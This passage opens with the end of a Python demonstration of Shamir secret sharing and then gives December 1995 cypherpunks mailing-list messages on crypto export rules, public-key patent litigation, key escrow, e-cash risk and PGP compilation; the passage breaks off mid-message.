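        raise ValueError("need 1 <= k <= n and 0 <= secret < prime")
    # Random polynomial of degree k-1 whose constant term is the secret.
    coeffs = [secret] + [secrets.randbelow(prime) for _ in range(k - 1)]
    shares = []
    for x in range(1, n + 1):
        y = 0
        for c in reversed(coeffs):       # Horner evaluation at x
            y = (y * x + c) % prime
        shares.append((x, y))
    return shares


def interpolate(points, x, prime=PRIME):
    """Lagrange-interpolate the polynomial through `points` and evaluate at x."""
    total = 0
    for i, (xi, yi) in enumerate(points):
        num, den = 1, 1
        for j, (xj, _) in enumerate(points):
            if i != j:
                num = num * (x - xj) % prime
                den = den * (xi - xj) % prime
        total = (total + yi * num * pow(den, -1, prime)) % prime
    return total


def combine(shares, prime=PRIME):
    """Recover the secret (the polynomial's value at x = 0) from k shares."""
    return interpolate(shares, 0, prime)


def consistent_share(partial, candidate, x_new, prime=PRIME):
    """Given k-1 shares, return the share at x_new that would make `candidate`
    the secret. Its existence for every candidate is why k-1 shares leak nothing."""
    return (x_new, interpolate([(0, candidate)] + partial, x_new, prime))


if __name__ == "__main__":
    key = 0x1F2E3D4C5B6A79880102030405060708 % PRIME  # constructed sample key
    pieces = split(key, k=3, n=3)       # three holders, all three required
    print("all three pooled:", combine(pieces) == key)

    two = pieces[:2]                     # only two holders cooperate
    for guess in (0, 42, key):
        third = consistent_share(two, guess, 3)
        print("guess", hex(guess), "fits the two shares:",
              combine(two + [third]) == guess)
```
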




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimbell@pacifier.com (jim bell)
Date: Wed, 6 Dec 95 13:40:05 PST
To: Ernest Hua <hua@chromatic.com>
Subject: Re: Solution for US/Foreign Software?
Message-ID: <m0tNR0t-00093sC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


>
>> I'm not saying they are a "bypass" of the laws.  Rather, I'm saying that
>> if the goal is to:
>> 
>> 1.  Let companies like Netscape make foreign sales.
>> 
>> 2.  Still comply with the letter of the law.
>
>It takes more than one or two people to coordinate an international effort.
>Once more than a few people know about it, it becomes "company policy" or
>"corporate objective", in which case, the NSA/DoS will eventually figure it
>out and start levying heavy fines and jailing the individuals.

You miss the point!  There will be no "international effort"!  Here are the steps:

1.  Write a program limited to keysize, carefully constructed to isolate those portions of the program which define key size, GAKedness, etc.
2.  Get it export approved.  Export it.

THEN

3.  Announce that a "US-only" version of the same program is being released, and include the minimal component which replaces the limited software.  Release it, only in the US of course!


>The main point is that there is no such thing as the "letter of the law".
>What they enforce is much broader than that, and how they enforce it is much
>more subtle than clear-cut criminal prosecution.  Therefore, you cannot just
>use literal loop holes just because it's not clear, because the law they are
>enforcing is not clear either.

The system I describe doesn't even violate the spirit of the rules.  If anything, it bends over backward to implement a foreign version of the software which ALREADY is export-approved at the time it was, um, upgraded.

True, it's possible to sneak the extra component out of the country, but hey, it's also possible to sneak an entirely new program out of the country.  I'm not suggesting that the company who writes the component takes it out, it'll happen regardless.

If the order of the versions was reversed, the USG might complain that the export version was "too similar" to the domestic version.  That's why you wait for the export approval before you write the domestic version.  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thad@hammerhead.com (Thaddeus J. Beier)
Date: Wed, 6 Dec 95 13:24:11 PST
To: cypherpunks@toad.com
Subject: Roger Schlafly's court hearing today
Message-ID: <199512062111.NAA01734@hammerhead.com>
MIME-Version: 1.0
Content-Type: text/plain



Roger Schlafly had a brief hearing this morning in Judge Williams
federal court on summary judgements with respect to the validity of
the various public key patents, and alleged anti-trust and unfair trade
practices.  Bob Wells and I were the only pro-tossing-the-patents out
people there, although sometimes-cypherpunk-meeting-attender Whit Diffie
was there as well.

The judge said right at the outset that he would not be making a decision
today, that he wanted guidance from Roger and the other side's lawyers about
the relevant issues, to help him wade through the tremendous amounts of
documentation provided.  I suppose that this could be expected, but the
issues here seemed to me, at least, to be relatively clear-cut.

There were basically four issues to be discussed, the Diffie-Hellman,
Hellman-Merkle, and RSA patents, and these unfair trade practices.
The judge had only allocated an hour for this discussion, and then
showed up 20 minutes late, which proved inadequate.  Still, I thought
that everyone was remarkably clear and concise with their answers, and
the judge asked reasonable questions.

First discussed were the unfair trade practices, where the lawyer for
what used to be PKP dragged in a lot of dirty laundry from the past,
describing why Roger got interested in this in the first place.
I don't understand what the complaint here was, the PKP lawyer said
that since Roger didn't have a product, what was he complaining about,
anyway?  It seemed like an odd defense to me, but again, I don't know
exactly what Roger's complaint was.  Roger agreed with the judge that
yes, everything he wanted to say was in his submission.

Next discussed was the Diffie-Hellman patent.  Roger stated that he had
four clear instances where an "enabling disclosure" was made about
Diffie-Hellman; three were presentations to large audiences, and one
was a pre-print of the famous "New Directions in Cryptography" paper.
Roger actually had the viewgraphs that Diffie used in his presentations.
These disclosures were all made more than 1 year before the patent was
filed, which is the limit in the US.  The lawyer from CalCan (something
like that) handled this one.  He said that the law specifically mentioned
publication, and that none of these was a publication.  I'm not sure
what the law says, and Roger disputed the claim that that is what the
law says.  Disappointingly to me, it appears that neither Diffie nor
Hellman has any recollection of when, to whom, or how many preprints
of the article were sent out.  It's terrible how the law seems to cloud
people's minds, isn't it?  What little I do know about patent law
tends to support Roger on this one, I think that it should be an open
and shut case, but we'll see.

Then we came to the Hellman-Merkle patent, which basically claims all
of public-key cryptography.  Roger's claim here was that the mechanism
described doesn't work, because knapsacks don't work, that is, the
invention is supposed to make generation of the decryption key infeasible,
by a very specific description of infeasibility in the claims of the patent.
(10^30 arithmetic operations necessary)  Well, that's not true.

The same lawyer for the other side took this on two different ways:
1) that nobody knew that knapsacks were insecure at the time that the
   patent was filed, how could the patent be found invalid based on something
   that happened later

2) and some variations (dense, iterated knapsacks) might still be secure.

Roger presented an analogy.  Say someone was able to persuade the patent
office that a drug cured cancer, and so he was able to obtain a patent on
it.  Later, it was found that the drug killed everybody who took it.  Should
the patent be valid, if it really didn't do what it said that it would?
Roger could have gotten melodramatic, and said that bad cryptography could
really kill people, and has many times, but he didn't; as I said, everybody
was remarkably concise and to the point.

Even so, we were out of time here, not having discussed the RSA patent
or the Schnorr patent at all.  The judge said that he will call another
hearing if he feels that it is required.

I thought, in my incredible naivete, that it went really well for Roger,
although I didn't have time to hang around and ask him how he thought it
went.  I think that his arguments are good, and if the law is sensible
he will prevail.

thad
-- Thaddeus Beier                   email:  thad@hammerhead.com
   Technology Development             vox:  408) 286-3376
   Hammerhead Productions             fax:  408) 292-2244




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Wed, 6 Dec 95 10:22:47 PST
To: Futplex <futplex@pseudonym.com>
Subject: Re: NIST GAK export meeting, short version
In-Reply-To: <199512060426.XAA20883@thor.cs.umass.edu>
Message-ID: <Pine.SUN.3.91.951206132336.19360H-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 5 Dec 1995, Futplex wrote:

> This answer sounds rather silly to me. Do they seriously doubt that the
> escrow mechanism works (modulo MAB's observations about the LEAF), or expect 

No.  They doubt that "software binding" works, ie are afraid someone will 
figure out an easy way to hack the software to by-pass the escrow mechanism.

> us to believe that they do ?  Clinton Brooks' comments cited later by Pat
> suggest a certain acceptance that enforcement will have its problems
> (e.g. strong crypto tunnelling), but perhaps Greiveldinger somehow doesn't
> officially share that view. Is there another interpretation of "working"
> I'm missing here ?
> 
> -Futplex <futplex@pseudonym.com>
> "I'm from the D.O.E. and I just need to leave this here temporarily"
> 	(from a political cartoon entitled "The 3 Biggest Whoppers")
> 

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter Monta <pmonta@qualcomm.com>
Date: Wed, 6 Dec 95 13:53:18 PST
To: cypherpunks@toad.com
Subject: Re: Geodesic Payment Systems? (was Re: Meeting notes from ANSI X.9 Meeting on Electronic Payment)
In-Reply-To: <Pine.SUN.3.91.951206104553.24528A-100000@eskimo.com>
Message-ID: <199512062154.NAA20063@mage.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


Wei Dai writes:

> > [ infinite-cost risk ]
>
> ...
> The direct cost of a break-the-bank catastrophic failure is bounded by the 
> amount of capital the bank has.  This is because the market will not 
> accept more liabilities (real or forged) from the bank than its capital.  
> There may be other indirect costs resulting from dislocations, but these 
> should also be proportional to the size of the bank.  Therefore your 
> argument is really against centralization and for diversification and 
> distribution.

Why "the bank", rather than "all banks"?  If there is a single
cryptographic point of failure in a widely used ecash system,
it seems unlikely that diversity would buy you anything.  The
worry would not be the compromised keys of a single bank, but
rather, say, an effective cryptanalysis.  I would put this in
the supernova class; it may be just as unlikely.

Peter Monta





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 6 Dec 95 12:41:42 PST
To: cypherpunks@toad.com
Subject: Re: News on Congressional Debate on Exon
Message-ID: <aceb402d1d021004fc00@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:31 PM 12/6/95, attila wrote:
>    well, there goes the neighborhood.
>
>    guess I better clean up my www front page which meets the Exon rules on
>indecency, pisses on ITAR, and is probably seditious as well. might as
>well get a start on it before the eager beavers hemorrhage!

In case anyone's worried about the short-term implications, you'll all have
plenty of time before enforcement starts. The conference committee has to
OK the final form, voting, etc., then the Prez has to sign it (or pocket
veto it, which is unlikely in the extreme). I'm no longer current on
schedules as I was in high school civics class, but I think it will take
effect some weeks or months after being signed into law.

And even then I think prosecutions will take a while to get rolling, as
cases are considered. It's not as if overnight the cops will be raiding
sites.

--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: DANIEL CHARPENTIER <drcharpe@hamlet.uncg.edu>
Date: Wed, 6 Dec 95 11:07:07 PST
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: PGP
In-Reply-To: <199512061853.MAA17582@spirit.sctc.com>
Message-ID: <Pine.SOL.3.91.951206135618.5233A-100000@hamlet>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 6 Dec 1995, david d `zoo' zuhn wrote:

> Also, you can have keys that are too large.  Do you want to take hours to
> encrypt a simple file, just because you have a 30000 bit key?  Do you
> expect your recipients to take the same amount of time (or more) to
> decrypt it?
> The tradeoff between cost & security is probably too high in that case (I
> surely wouldn't bother to decrypt anything you sent me if I had to wait
> hours or more).

    Now be practical.  You do have options.  Just because you have the 
capability to encrypt with a 30000 bit key does NOT mean that it is
mandated that you encrypt with a 30000 bit key.  The reason that cypherpunks
is even in existence is that sometimes privacy is a must.  Sometimes
you want to make sure that a common thief can not read your files and 
others you want to make sure the N.S.A. can not read your files.  This
is not in dispute.  We all know this.  Having the option is comforting ( in
my opinion of course ).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu>
Date: Wed, 6 Dec 95 11:24:02 PST
To: nsb+limbo@nsb.fv.com
Subject: Re: Geodesic Payment Systems? (was Re: Meeting notes from ANSI X.9Meeting on Electronic Payment)
Message-ID: <01HYHNP19ND89S3REI@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"nsb+limbo@nsb.fv.com"  "Nathaniel Borenstein"  6-DEC-1995 07:21:19.03

I had assumed that there was a market discount, but it's still not quite
that simple.  It's very hard for markets to deal with *unbounded* risk. 
The biggest problem I see with most of the crypto-cash schemes is that
there is a legitimate scenario -- however low-probability you might
assess it to be -- of break-the-bank catastrophic failure, i.e. in which
someone gains the keys that allow him to essentially print money.  This
kind of low-probability, infinite-cost risk is the kind of thing that
gives underwriters the heebie jeebies.  There's a good reason that most
companies have "Ltd" after their name instead of "Unlimited", in those
countries where that's the naming convention.
--------------------------
	The risk in question is not infinite-cost. If the person who gets
ahold of the keys starts simply making lots and lots of money, in a free
market the prices in digital cash for everything will start going up. This
phenomenon will be spotted, and those taking the particular variety in
question will stop accepting it. Losses are limited to however much was out
there at a given time, and if there are multiple systems with free-market
interconversion between them, that may not be very much. People will move
out of a decaying monetary system if: A. the new system is as easy to get
as the old; and B. the new system is as easy to spend as the old.
	If the person who gets the keys simply uses them on a small scale,
then the resulting inflation and loss of value can simply be dealt with
using the discount mechanism. It's no longer infinite risk.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 6 Dec 95 14:22:48 PST
To: cypherpunks@toad.com
Subject: Cyberia-L Archive [was Re: ERA_sur]
Message-ID: <Pine.ULT.3.91.951206142028.4575V-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


As somebody pointed out to me, Cyberia-L, like cypherpunks, is archived 
on http://www.hks.net/ and the public news server nntp.hks.net.

Now send them some of the money you're going to make from the stock market.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: DANIEL CHARPENTIER <drcharpe@hamlet.uncg.edu>
Date: Wed, 6 Dec 95 11:26:46 PST
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: PGP
In-Reply-To: <199512061921.NAA00167@cdale1.midwest.net>
Message-ID: <Pine.SOL.3.91.951206141124.5233C-100000@hamlet>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 6 Dec 1995, David E. Smith wrote:

> Firstly - and don't take this personally - how much computer
> knowledge do you have?  The PGP sources use all sorts of
> #ifdefs and other kludges.  A fair amount of C coding
> ability is needed to get the damn things to do much of
> anything.  (Hell, I can't read most of it - my precompiled
> MSDOS version does what I need it to do.)


    Sorry...I was always taught that the user should not
be mandated to finish the job of the programmer.  Please,
do not take me wrong, PGP is a remarkable tool...but I
was not aware I had to iron out the bugs.  That part is the
easiest to do compared with the genius of the program...
but I still should not have to do it.


> If you make PGP more user friendly... well, PGP 3.0 is still
> coming Real Soon Now (TM) and it will include an API that
> will make hooking into it ridiculously simple.  Beyond that,
> there are already a number of good DOS and Windows shells
> for it, and nobody on unix-flavoured systems expects a clean
> user interface anyway :)  (Well, except for XWindows...)


       Well maybe they ( people on "unix-flavoured systems" ) should
expect a clean interface.  If the interface were more sound then
maybe the common man ( person ) wouldn't be so scared of it.  I have 
a lot of friends that gave up on cryptography because they could not
get the darned programs to work ( at least the good ones anyway ).

         

> And the key values - well, you can give it 32k bits, but 1.
> generating a key pair could take a prohibitively long time;
> 2. nobody else can use it (the default PGP distributions
> are capped off at 2047 bits).

    I was not using 32k bit keys with PGP...but I'll look at the
code.  To tell you the truth I never thought about modifying PGP
to generate that large of a key.  When I finish it I'll post the
source here.  I'm sure someone here would like to at least have
the option.



    Thank you for the input.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu>
Date: Wed, 6 Dec 95 11:32:59 PST
To: hal9001@panix.com
Subject: Re: Secret Clearance
Message-ID: <01HYHO17G39Y9S3REI@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"hal9001@panix.com"  "Robert A. Rosenberg"  6-DEC-1995 12:50:58.52

The problem is that they are subject to blackmail/bribery/subversion ONLY
because the employer will use the info as an excuse for firing/restricting
the employee. If someone has a "skeleton in the closet" such as being gay,
so long as the employer does not discriminate against gays who INFORM the
employer of their sexual orientation or if the employer does not care about
the person being gay (ie: removes it as a potential blackmail threat) there is
no problem so far as I can see. It is only when there is something that is
WORK RELATED which would affect the person's performance if not known that
the question of a background check is relevant.
-------------------
	Unfortunately, this only works if one assumes that work is the only
thing that is valuable in the person's life. Blackmail can easily be used
against someone who is afraid of some information emerging to their family,
for instance. This perspective still isn't an excuse for disallowing gays,
however... the person who should be held responsible for such problems is
the person who responds negatively to the revelation. In other words, if the
person's family would react negatively to the person being gay, that's the
family's problem, and should be treated as such.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Wed, 6 Dec 95 11:38:05 PST
To: cypherpunks <cypherpunks@toad.com>
Subject: re: NIST GAK export meeting, sv
In-Reply-To: <199512052356.AAA09563@utopia.hacktic.nl>
Message-ID: <Pine.SUN.3.91.951206143218.19801G-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


Imagine you are in the Justice Dept.  You have to work out a policy for 
escrow agents because your boss says so.  You begin to work out 
scenarios, just like when you design software.  One scenario is that the 
FISA court issues a warrant for a wiretap/decrypt of a suspected foreign 
agent.  The fact of the order, and esp. the ID of the target, have a 
SECRET classification.  It is a crime to show a SECRET document to a 
person without clearance.  Yet, escrow agents can reasonably refuse to 
disclose a key (indeed, SHOULD refuse to disclose a key) without seeing a 
real warrant.  

How do you solve the problem?  (Hint: asking Congress to change either 
the classification laws, the FISA court rules, or the GAK policy are not 
options.)

I'm certain the above was a large part of their thinking in adding the
requirement of a SECRET cleared person.  If you accept their premises --
note the "if" -- it makes a certain degree of sense.  I offer the 
following two bets for which I have no evidence:

1) This will be the PR that most damages the proposal
2) If they ever actually implement the policy, they will give the 
clearances out as fast as they can, just to show good faith.  Not that 
SECRET is a very high clearance any more, anyway....Its main value is in 
giving them another way to jail you if you leak the fact of the order and it 
ruins the investigation.  (Plus, I suppose, obstruction of justice...)

CRYPTO: Does anyone recall the cite for a paper a few years ago that set out a
way to have escrow agents who would be "oblivious" to the identity of the
subject of the warrant?  And how would such an escrow agent be sure that
they were not being duped by the feds? 

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 6 Dec 95 14:41:25 PST
To: cypherpunks@toad.com
Subject: Press Release on Response to Microsoft Internet Announcements
Message-ID: <Pine.ULT.3.91.951206142716.4575W-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I just posted the following from stanford.edu; it probably won't be
approved and propagated in time, though. 

By the way, alt.internet.media-coverage, to which someone pointed me, is 
explicitly *not* for press releases. 

I do not plan to utter the string "cypherpunks@toad.com" because I think 
there's enough noise here already (some from me). 

Apologies to sameer for being presumptuous, but I did say "hope," and I 
also think tomorrow would be a really good time to document the .PWL file 
bugs...

- -rich

- ---------- Forwarded message ----------
Date: Wed, 06 Dec 1995 14:39:23 -0800
From: Rich Graves <w95netbugs@aol.com>
Newgroups: misc.news.internet.announce, misc.news.internet.discuss
Subject: Info on Microsoft Internet Announcements Thursday, December 7, 1995

Please reply, if necessary, to the address in the current FAQ, because I 
very seldom actually log on to America "On Line." Before forwarding this 
along, please check whether this has already been done; and let me know 
after the fact.

As has already been announced in the print press, Bill Gates, who works 
at a large software company, will hold a press conference tomorrow, 
December 7th (a date with some historical significance), to announce 
Microsoft's Internet strategy.

For information on Microsoft-sponsored marketing events in your area, 
please see http://www.microsoft.com/events/

Approximately fifteen minutes after Mr. Gates begins speaking (anyone 
have the exact schedule? please phone me), we hope to release very 
significant updates to the following Internet sites:

http://www.c2.org/hackmsoft/
  [information on a few security problems with Microsoft products]

http://www-leland.stanford.edu/~llurch/win95netbugs/faq.html
  [canon URL; multiple DNS-load-balancing SPARCServers]

http://www-dccs.stanford.edu/NetConsult/Win95Net/faq.html
  [use this mirror of the above if you have an old DNS server that
   barfs on the www-leland lbnamed tricks]

news.answers, comp.answers, comp.protocols.tcp-ip.ibmpc, and several
higher-traffic groups will receive a text rendering of the above. This 
will be the first approved and rtfm-archived posting; the news-answers 
folks got back to me last week.

gopher://quixote.stanford.edu/1m/win95netbugs will get a text rendering 
of the above, and contains relevant messages from an email discussion 
list.

An email autoresponder to be named later (finger 
llurch@elaine.stanford.edu in the morning).

The various archives on http://www.hks.net/ have additional information 
for the technically minded.

A PGP-signed copy of this announcement is available on request, but I 
don't want to confuse the unwashed masses unnecessarily.

- -rich
 "A day that will live in infamy"

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMMYaz43DXUbM57SdAQEeDQP/a8ZccX4fpMbKCNa6Cllii0qWI6A8oUKH
30fdoGl1HvlgWVhsB0paVLsQS8tQGsVt/MzKJLasTsnKuYVJCmdgmXcj9nEE9YIY
SxBEDn6yGno2ey7G1lXJSkeVAjB8o/fX+kZXGNKfOGKgNqjIl12jHbW7NX1bsIKi
wQl/s4uikQs=
=6Z1M
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@ATHENA.MIT.EDU>
Date: Wed, 6 Dec 95 11:42:08 PST
To: DANIEL CHARPENTIER <drcharpe@hamlet.uncg.edu>
Subject: Re: PGP
In-Reply-To: <Pine.SOL.3.91.951206141124.5233C-100000@hamlet>
Message-ID: <199512061943.OAA22480@charon.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


The PGP sources build on most UNIX platforms.  Have you read the
setup.doc?  Have you followed the instructions?  What Unix platform
are you using?  In general, all you need to do is:
	1) build rsaref:
		cd rsaref/install/unix; make
	2) build pgp:
		cd src; make <platform>

Modulo a few quirks, that should be all.  Look at the PGP FAQ,
Buglist, Fixes, and Improvements Page for a list of known bugs+fixes
in PGP 2.6.2:
	http://www.mit.edu:8001/people/warlord/pgp-faq.html

If you need more help, email me offline (i.e., do not cc: cypherpunks)

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hroller Anonymous Remailer <hroller@c2.org>
Date: Wed, 6 Dec 95 14:58:26 PST
To: cypherpunks@toad.com
Subject: [NOISE] Re: PGP
Message-ID: <199512062254.OAA12338@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> > you really ought to be more thoughtful about what and how you write on 
> > the cypherpunks list...

** Vast numbers of double spaces deleted **

>     The how is referring to not double spacing isn't it.  Sorry,
> I've been up for the last couple of days and didn't even realize it.
> What do you mean what I write about?   

He means that this is NOT alt.security.pgp - we are not here to teach you 
how to use a bloody C compiler or to summarise README notes for you. 
RTFM.

> > anyway,  the PGP code from MIT should compile on nearly all unix 
> > machines.  i'm not sure it will compile with a g++ compiler though.  all 
> > unix type machines should have uncompress, tar, (g)cc.  just get the 
> > source from MIT.
> 
>       I am not an idiot.  I must have downloaded PGP from about 20 million
> different places.  They are all either missing files, some times the
> darn code won't compile, or when I "tar xvf" half of the files bring
> up an error and the computer says it can not create the file.  I'll try
> the address that you've sent.  Hopefully I will have better luck. 

You want help, but supply minimal information.
Post your problem to the appropriate place - alt.security.pgp, and supply
a bit of information - what version of the source are you trying to 
compile, what Unix platform, what version of the C compiler, etc.

>       In the pursuit of constructing a stable cryptographic program
> that uses PGP what features should be included.  Obviously all of
> the ones that PGP has and encrypting/decrypting e-mail but what else?

?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Wed, 6 Dec 95 13:24:47 PST
To: nobody@replay.com (Anonymous)
Subject: Re: NIST GAK export meeting, sv
In-Reply-To: <199512060335.EAA20054@utopia.hacktic.nl>
Message-ID: <199512062125.QAA14673@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous writes:
>What
>troubles me is the suggestion that *every* agent *must* hire someone who
>might answer to a higher authority, as it were. And what troubles me more
>is watching this paragovernment's transparent efforts to reproduce itself
>step by step, always trying to elude efforts to make it accountable or
>subordinate to civil authorities.

Whoa.  Time-out.  Having a SECRET clearance does not imply that one is
answerable to the government.  You don't get a clearance independent of
a job.  You have to be hired for the job, then the investigators look
for anything that might disqualify you, then you get the clearance.

A key-escrow company could hire anyone they want.  Assuming that
they're approved for a SECRET billet when they're approved as an escrow
agent, the *company* designates the individual the government is to
investigate.

The only leverage the government really has is the right to take the
clearance away.  The person (and probably the company) could sue for
its return if it was really done as a pressure tactic.  The guidelines
for approving or denying such clearances are pretty specific.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Wed, 6 Dec 95 12:53:03 PST
To: cypherpunks@toad.com
Subject: Re: No More Netscape Comments from Me
In-Reply-To: <199512061647.LAA12675@jekyll.piermont.com>
Message-ID: <XZFPFD3w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" <perry@piermont.com> writes:
> Robert Hettinga writes:
> > >So, have fun riding the Great Internet Bubble of 1995!
> >
> > Yeah... I wonder what the price of Netscape puts around, say, March are
> > these days...
>
> No conventional options are available on Netscape yet. The price on
> custom options is high, and you have to trade a very large (quarter to
> half million dollar) sum in order to get them.

But you can already sell it short. (I.e., you sell shares of Netscape now
for future delivery, hoping that before the time you must deliver them, the
price will go down and you'll be able to buy the shares to cover the sale
at a lower price than you sold them for.)

Someone I know sold a bunch of Netscape short about the time the various
cracks were announced on this mailing list.  Unfortunately for him, the
price didn't go down.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 6 Dec 95 15:35:15 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: NIST GAK export meeting, short version
Message-ID: <199512062336.PAA13924@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:26 PM 12/5/95 -0500, Futplex <futplex@pseudonym.com> wrote:
>> and on the 64-bit issue, that the government is "not certain it will
>> work." he says they "want to see it implemented and want to see
...
>This answer sounds rather silly to me. Do they seriously doubt that the
>escrow mechanism works (modulo MAB's observations about the LEAF), or expect 
>us to believe that they do ?  Clinton Brooks' comments cited later by Pat
>suggest a certain acceptance that enforcement will have its problems
>(e.g. strong crypto tunnelling), but perhaps Greiveldinger somehow doesn't
>officially share that view. Is there another interpretation of "working"
>I'm missing here ?

"Works" means a lot of things, even if you limit the discussion to official
court warrants requested with honest affidavits.  The code is supposed to 
discourage tampering, but suspects may still successfully disable GAK.
Escrow agents are supposed to deliver the correct keys successfully without
losing them (or storing them safely in the basement next to the cyclotron),
and they may not always provide 7x24 access (or may charge extra for it,
as well as charging for their lawyer's review of the warrant.)
Or the escrow agents may be multinationals that store their files off-shore.
Or the SECRET cleared escrow employee may have quit, making it more difficult
to handle classified requests.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281

# Anybody notice that Microsoft's Wide Open Road ad has barbed-wire fences
# on both sides of the road?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 6 Dec 95 15:35:19 PST
To: cypherpunks@toad.com
Subject: Re: Solution for US/Foreign Software?
Message-ID: <199512062336.PAA13979@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>1.  Write a program with limited encryption (40 bit?), with the encryption
>>>module in a file external to the  main program.
>>>2.  Get export approval for this program.
>>>3.  Write a module which replaces the encryption file, increasing key size
>>>to whatever you REALLY wanted in the first place.  (128-bit IDEA, 2000-bit
>>>PGP, etc.)
>>>4.  Ship that new module with the old software to US customers.
>>>Naturally, that new module will "leak," so anybody who buys the old

Tim May replied
>>"Crypto hooks," basically the scheme you are proposing, were thought of by
>>the authorities and are not a bypass of the crypto export laws.

I had interpreted the suggestion differently - rather than a system with 
user-accessible crypto hooks, the manufacturer could ship a binary patch
upgrade for US customers to install.  The internal design would presumably
have crypto hooks (i.e. subroutine calls); they can't ban that.

Of course, if you follow this strategy, get export approval for version 1.0,
and ship the US-only patch as 1.1, getting export approval for version 2.0
may be a shade more difficult...
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281

# Anybody notice that Microsoft's Wide Open Road ad has barbed-wire fences
# on both sides of the road?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 6 Dec 95 15:35:34 PST
To: cypherpunks@toad.com
Subject: Re: NIST GAK export meeting, short version
Message-ID: <199512062336.PAA14035@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:11 AM 12/6/95 -0400, pfarrell@netcom.com wrote:
>They claimed it was needed so that they can serve a court order
>that is SECRET. ....
>The main area that they claimed was for FISA orders. 

Maybe this is just an artifact of Pat's wording, but this sounds
like there may be classified court orders other than FISA?

> Plus, since you have to be a US citizen to get a clearance, 
> how can there be approved foreign escrow agents?

By deals with the foreign governments, presumably reciprocal.
The US would allow export of software using the escrow keys for
Banque du Commerce et Credit Internationale - Paris, if the
bank and the French spooks signed an agreement for escrow access,
and in return the US would probably agree to give the French 
access to some US-escrowed keys (with proper requests, of course.)

>And the usual, why in hell would a competent spy use
>crypto escrowed in the US?

Competent spies appear to be a surprisingly small fraction of
